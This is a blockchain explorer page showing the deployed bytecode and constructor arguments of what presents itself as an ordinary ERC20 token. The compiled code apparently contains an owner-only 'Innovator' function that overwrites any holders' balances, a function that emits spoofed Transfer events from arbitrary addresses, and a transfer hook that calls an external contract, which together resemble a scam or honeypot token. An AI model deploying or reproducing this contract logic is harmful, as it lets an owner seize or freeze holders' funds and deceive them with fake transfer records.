ffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60008273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610bcc91906112ea565b60405180910390a3600190509392505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4d90611c3f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbc90611cd1565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610da391906112ea565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1690611d63565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e8e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8590611df5565b60405180910390fd5b610e99838383611003565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1690611e87565b60405180910390fd5b8181610f2b9190611969565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610fbb9190611b07565b92505081905550610fcd848484611106565b50505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161461110157600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637512c5a3848430600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866040518663ffffffff1660e01b81526004016110bc959493929190611ea7565b6020604051808303816000875af11580156110db573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110ff9190611833565b505b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114557808201518184015260208101905061112a565b60008484015250505050565b6000601f19601f8301169050919050565b600061116d8261110b565b6111778185611116565b9350611187818560208601611127565b61119081611151565b840191505092915050565b600060208201905081810360008301526111b58184611162565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111fc826111d1565b9050919050565b61120c816111f1565b811461121757600080fd5b50565b60008135905061122981611203565b92915050565b6000819050919050565b6112428161122f565b811461124d57600080fd5b50565b60008135905061125f81611239565b92915050565b6000806040838503121561127c5761127b6111c7565b5b600061128a8582860161121a565b925050602061129b85828601611250565b9150509250929050565b60008115159050919050565b6112ba816112a5565b82525050565b60006020820190506112d560008301846112b1565b92915050565b6112e48161122f565b82525050565b60006020820190506112ff60008301846112db565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61134282611151565b810181811067ffffffffffffffff821117156113615761136061130a565b5b80604052505050565b60006113746111bd565b90506113808282611339565b919050565b600067ffffffffffffffff8211156113a05761139f61130a565b5b602082029050602081019050919050565b600080fd5b60006113c96113c484611385565b61136a565b905080838252602082019050602084028301858111156113ec576113eb6113b1565b5b835b818110156114155780611401888261121a565b8452602084019350506020810190506113ee565b5050509392505050565b600082601f83011261143457611433611305565b5b81356114448482602086016113b6565b91505092915050565b600067ffffffffffffffff8211156114685761146761130a565b5b602082029050602081019050919050565b600061148c6114878461144d565b61136a565b905080838252602082019050602084028301858111156114af576114ae6113b1565b5b835b818110156114d857806114c48882611250565b8452602084019350506020810190506114b1565b5050509392505050565b600082601f8301126114f7576114f6611305565b5b8135611507848260208601611479565b91505092915050565b600080600080600060a0868803121561152c5761152b6111c7565b5b600061153a8882890161121a565b955050602086013567ffffffffffffffff81111561155b5761155a6111cc565b5b6115678882890161141f565b945050604086013567ffffffffffffffff811115611588576115876111cc565b5b611594888289016114e2565b935050606086013567ffffffffffffffff8111156115b5576115b46111cc565b5b6115c1888289016114e2565b92505060806115d28882890161121a565b9150509295509295909350565b6000806000606084860312156115f8576115f76111c7565b5b60006116068682870161121a565b93505060206116178682870161121a565b925050604061162886828701611250565b9150509250925092565b600060ff82169050919050565b61164881611632565b82525050565b6000602082019050611663600083018461163f565b92915050565b600080604083850312156116805761167f6111c7565b5b600083013567ffffffffffffffff81111561169e5761169d6111cc565b5b6116aa8582860161141f565b92505060206116bb85828601611250565b9150509250929050565b6000602082840312156116db576116da6111c7565b5b60006116e98482850161121a565b91505092915050565b60008060408385031215611709576117086111c7565b5b60006117178582860161121a565b92505060206117288582860161121a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061177957607f821691505b60208210810361178c5761178b611732565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6117ca816111f1565b82525050565b60006060820190506117e560008301866117c1565b6117f260208301856117c1565b6117ff60408301846112db565b949350505050565b611810816112a5565b811461181b57600080fd5b50565b60008151905061182d81611807565b92915050565b600060208284031215611849576118486111c7565b5b60006118578482850161181e565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061189a8261122f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118cc576118cb611860565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000611933602883611116565b915061193e826118d7565b604082019050919050565b6000602082019050818103600083015261196281611926565b9050919050565b60006119748261122f565b915061197f8361122f565b925082820390508181111561199757611996611860565b5b92915050565b7f556e617574686f72697a65643a20496e6e6f7661746f7220616363657373206e60008201527f65656465642e0000000000000000000000000000000000000000000000000000602082015250565b60006119f9602683611116565b9150611a048261199d565b604082019050919050565b60006020820190508181036000830152611a28816119ec565b9050919050565b7f416d6f756e74206d757374206265206e6f6e2d6e656761746976650000000000600082015250565b6000611a65601b83611116565b9150611a7082611a2f565b602082019050919050565b60006020820190508181036000830152611a9481611a58565b9050919050565b7f496e76616c696420616464726573732073706563696669656400000000000000600082015250565b6000611ad1601983611116565b9150611adc82611a9b565b602082019050919050565b60006020820190508181036000830152611b0081611ac4565b9050919050565b6000611b128261122f565b9150611b1d8361122f565b9250828201905080821115611b3557611b34611860565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611b97602583611116565b9150611ba282611b3b565b604082019050919050565b60006020820190508181036000830152611bc681611b8a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611c29602483611116565b9150611c3482611bcd565b604082019050919050565b60006020820190508181036000830152611c5881611c1c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611cbb602283611116565b9150611cc682611c5f565b604082019050919050565b60006020820190508181036000830152611cea81611cae565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d4d602583611116565b9150611d5882611cf1565b604082019050919050565b60006020820190508181036000830152611d7c81611d40565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611ddf602383611116565b9150611dea82611d83565b604082019050919050565b60006020820190508181036000830152611e0e81611dd2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e71602683611116565b9150611e7c82611e15565b604082019050919050565b60006020820190508181036000830152611ea081611e64565b9050919050565b600060a082019050611ebc60008301886117c1565b611ec960208301876117c1565b611ed660408301866117c1565b611ee360608301856117c1565b611ef060808301846112db565b969550505050505056fea264697066735822122024e4378cc95c1caa1c6036feb2f870ed3a02af7cc9af6a28db879fae2c7263ee64736f6c63430008110033000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000000000186a0000000000000000000000000ee3e375feb6197c5b37c210fbae8d09828e3adb0000000000000000000000000fbfeaf0da0f2fde5c66df570133ae35f3eb58c9a

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063395093511161008c578063a457c2d711610066578063a457c2d714610273578063a9059cbb146102a3578063dd62ed3e146102d3578063e156b1b614610303576100ea565b806339509351146101f557806370a082311461022557806395d89b4114610255576100ea565b80631c63aef2116100c85780631c63aef21461015b57806323b872dd1461018b578063313ce567146101bb57806334cfdce1146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f7610333565b604051610104919061119b565b60405180910390f35b61012760048036038101906101229190611265565b6103c5565b60405161013491906112c0565b60405180910390f35b6101456103e3565b60405161015291906112ea565b60405180910390f35b61017560048036038101906101709190611510565b6103ed565b60405161018291906112c0565b60405180910390f35b6101a560048036038101906101a091906115df565b61056d565b6040516101b291906112c0565b60405180910390f35b6101c361066e565b6040516101d0919061164e565b60405180910390f35b6101f360048036038101906101ee9190611669565b61067d565b005b61020f600480360381019061020a9190611265565b61084e565b60405161021c91906112c0565b60405180910390f35b61023f600480360381019061023a91906116c5565b6108fa565b60405161024c91906112ea565b60405180910390f35b61025d610942565b60405161026a919061119b565b60405180910390f35b61028d60048036038101906102889190611265565b6109d4565b60405161029a91906112c0565b60405180910390f35b6102bd60048036038101906102b89190611265565b610ac8565b6040516102ca91906112c0565b60405180910390f35b6102ed60048036038101906102e891906116f2565b610ae6565b6040516102fa91906112ea565b60405180910390f35b61031d600480360381019061031891906115df565b610b6d565b60405161032a91906112c0565b60405180910390f35b60606004805461034290611761565b80601f016020809104026020016040519081016040528092919081815260200182805461036e90611761565b80156103bb5780601f10610390576101008083540402835291602001916103bb565b820191906000526020600020905b81548152906001019060200180831161039e57829003601f168201915b5050505050905090565b60006103d96103d2610bdf565b8484610be7565b6001905092915050565b6000600354905090565b600080600090505b855181101561055f5785818151811061041157610410611792565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87848151811061047a57610479611792565b5b602002602001015160405161048f91906112ea565b60405180910390a38273ffffffffffffffffffffffffffffffffffffffff1663e156b1b68783815181106104c6576104c5611792565b5b6020026020010151898785815181106104e2576104e1611792565b5b60200260200101516040518463ffffffff1660e01b8152600401610508939291906117d0565b6020604051808303816000875af1158015610527573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061054b9190611833565b5080806105579061188f565b9150506103f5565b506001905095945050505050565b600061057a848484610db0565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105c5610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610645576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161063c90611949565b60405180910390fd5b61066285610651610bdf565b858461065d9190611969565b610be7565b60019150509392505050565b6000610678610fd3565b905090565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166106be610ffb565b73ffffffffffffffffffffffffffffffffffffffff1614610714576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070b90611a0f565b60405180910390fd5b6000811015610758576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074f90611a7b565b60405180910390fd5b60005b825181101561084957600083828151811061077957610778611792565b5b60200260200101519050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e990611ae7565b60405180910390fd5b826000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505080806108419061188f565b91505061075b565b505050565b60006108f061085b610bdf565b848460016000610869610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546108eb9190611b07565b610be7565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461095190611761565b80601f016020809104026020016040519081016040528092919081815260200182805461097d90611761565b80156109ca5780601f1061099f576101008083540402835291602001916109ca565b820191906000526020600020905b8154815290600101906020018083116109ad57829003601f168201915b5050505050905090565b600080600160006109e3610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610aa0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9790611bad565b60405180910390fd5b610abd610aab610bdf565b858584610ab89190611969565b610be7565b600191505092915050565b6000610adc610ad5610bdf565b8484610db0565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60008273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610bcc91906112ea565b60405180910390a3600190509392505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c56576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4d90611c3f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbc90611cd1565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610da391906112ea565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1690611d63565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e8e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8590611df5565b60405180910390fd5b610e99838383611003565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1690611e87565b60405180910390fd5b8181610f2b9190611969565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610fbb9190611b07565b92505081905550610fcd848484611106565b50505050565b60007f0000000000000000000000000000000000000000000000000000000000000009905090565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161461110157600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637512c5a3848430600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866040518663ffffffff1660e01b81526004016110bc959493929190611ea7565b6020604051808303816000875af11580156110db573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110ff9190611833565b505b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114557808201518184015260208101905061112a565b60008484015250505050565b6000601f19601f8301169050919050565b600061116d8261110b565b6111778185611116565b9350611187818560208601611127565b61119081611151565b840191505092915050565b600060208201905081810360008301526111b58184611162565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111fc826111d1565b9050919050565b61120c816111f1565b811461121757600080fd5b50565b60008135905061122981611203565b92915050565b6000819050919050565b6112428161122f565b811461124d57600080fd5b50565b60008135905061125f81611239565b92915050565b6000806040838503121561127c5761127b6111c7565b5b600061128a8582860161121a565b925050602061129b85828601611250565b9150509250929050565b60008115159050919050565b6112ba816112a5565b82525050565b60006020820190506112d560008301846112b1565b92915050565b6112e48161122f565b82525050565b60006020820190506112ff60008301846112db565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61134282611151565b810181811067ffffffffffffffff821117156113615761136061130a565b5b80604052505050565b60006113746111bd565b90506113808282611339565b919050565b600067ffffffffffffffff8211156113a05761139f61130a565b5b602082029050602081019050919050565b600080fd5b60006113c96113c484611385565b61136a565b905080838252602082019050602084028301858111156113ec576113eb6113b1565b5b835b818110156114155780611401888261121a565b8452602084019350506020810190506113ee565b5050509392505050565b600082601f83011261143457611433611305565b5b81356114448482602086016113b6565b91505092915050565b600067ffffffffffffffff8211156114685761146761130a565b5b602082029050602081019050919050565b600061148c6114878461144d565b61136a565b905080838252602082019050602084028301858111156114af576114ae6113b1565b5b835b818110156114d857806114c48882611250565b8452602084019350506020810190506114b1565b5050509392505050565b600082601f8301126114f7576114f6611305565b5b8135611507848260208601611479565b91505092915050565b600080600080600060a0868803121561152c5761152b6111c7565b5b600061153a8882890161121a565b955050602086013567ffffffffffffffff81111561155b5761155a6111cc565b5b6115678882890161141f565b945050604086013567ffffffffffffffff811115611588576115876111cc565b5b611594888289016114e2565b935050606086013567ffffffffffffffff8111156115b5576115b46111cc565b5b6115c1888289016114e2565b92505060806115d28882890161121a565b9150509295509295909350565b6000806000606084860312156115f8576115f76111c7565b5b60006116068682870161121a565b93505060206116178682870161121a565b925050604061162886828701611250565b9150509250925092565b600060ff82169050919050565b61164881611632565b82525050565b6000602082019050611663600083018461163f565b92915050565b600080604083850312156116805761167f6111c7565b5b600083013567ffffffffffffffff81111561169e5761169d6111cc565b5b6116aa8582860161141f565b92505060206116bb85828601611250565b9150509250929050565b6000602082840312156116db576116da6111c7565b5b60006116e98482850161121a565b91505092915050565b60008060408385031215611709576117086111c7565b5b60006117178582860161121a565b92505060206117288582860161121a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061177957607f821691505b60208210810361178c5761178b611732565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6117ca816111f1565b82525050565b60006060820190506117e560008301866117c1565b6117f260208301856117c1565b6117ff60408301846112db565b949350505050565b611810816112a5565b811461181b57600080fd5b50565b60008151905061182d81611807565b92915050565b600060208284031215611849576118486111c7565b5b60006118578482850161181e565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061189a8261122f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118cc576118cb611860565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000611933602883611116565b915061193e826118d7565b604082019050919050565b6000602082019050818103600083015261196281611926565b9050919050565b60006119748261122f565b915061197f8361122f565b925082820390508181111561199757611996611860565b5b92915050565b7f556e617574686f72697a65643a20496e6e6f7661746f7220616363657373206e60008201527f65656465642e0000000000000000000000000000000000000000000000000000602082015250565b60006119f9602683611116565b9150611a048261199d565b604082019050919050565b60006020820190508181036000830152611a28816119ec565b9050919050565b7f416d6f756e74206d757374206265206e6f6e2d6e656761746976650000000000600082015250565b6000611a65601b83611116565b9150611a7082611a2f565b602082019050919050565b60006020820190508181036000830152611a9481611a58565b9050919050565b7f496e76616c696420616464726573732073706563696669656400000000000000600082015250565b6000611ad1601983611116565b9150611adc82611a9b565b602082019050919050565b60006020820190508181036000830152611b0081611ac4565b9050919050565b6000611b128261122f565b9150611b1d8361122f565b9250828201905080821115611b3557611b34611860565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611b97602583611116565b9150611ba282611b3b565b604082019050919050565b60006020820190508181036000830152611bc681611b8a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611c29602483611116565b9150611c3482611bcd565b604082019050919050565b60006020820190508181036000830152611c5881611c1c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611cbb602283611116565b9150611cc682611c5f565b604082019050919050565b60006020820190508181036000830152611cea81611cae565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d4d602583611116565b9150611d5882611cf1565b604082019050919050565b60006020820190508181036000830152611d7c81611d40565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611ddf602383611116565b9150611dea82611d83565b604082019050919050565b60006020820190508181036000830152611e0e81611dd2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e71602683611116565b9150611e7c82611e15565b604082019050919050565b60006020820190508181036000830152611ea081611e64565b9050919050565b600060a082019050611ebc60008301886117c1565b611ec960208301876117c1565b611ed660408301866117c1565b611ee360608301856117c1565b611ef060808301846112db565b969550505050505056fea264697066735822122024e4378cc95c1caa1c6036feb2f870ed3a02af7cc9af6a28db879fae2c7263ee64736f6c63430008110033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000000000186a0000000000000000000000000ee3e375feb6197c5b37c210fbae8d09828e3adb0000000000000000000000000fbfeaf0da0f2fde5c66df570133ae35f3eb58c9a

-----Decoded View---------------
Arg [0] : decimals_ (uint8): 9
Arg [1] : initialBalance_ (uint256): 100000
Arg [2] : feeReceiver_ (address): 0xee3e375feb6197c5B37C210FbAe8d09828e3adB0
Arg [3] : owner_ (address): 0xfbfEaF0DA0F2fdE5c66dF570133aE35f3eB58c9A

-----Encoded View---------------
4 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [1] : 00000000000000000000000000000000000000000000000000000000000186a0
Arg [2] : 000000000000000000000000ee3e375feb6197c5b37c210fbae8d09828e3adb0
Arg [3] : 000000000000000000000000fbfeaf0da0f2fde5c66df570133ae35f3eb58c9a


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.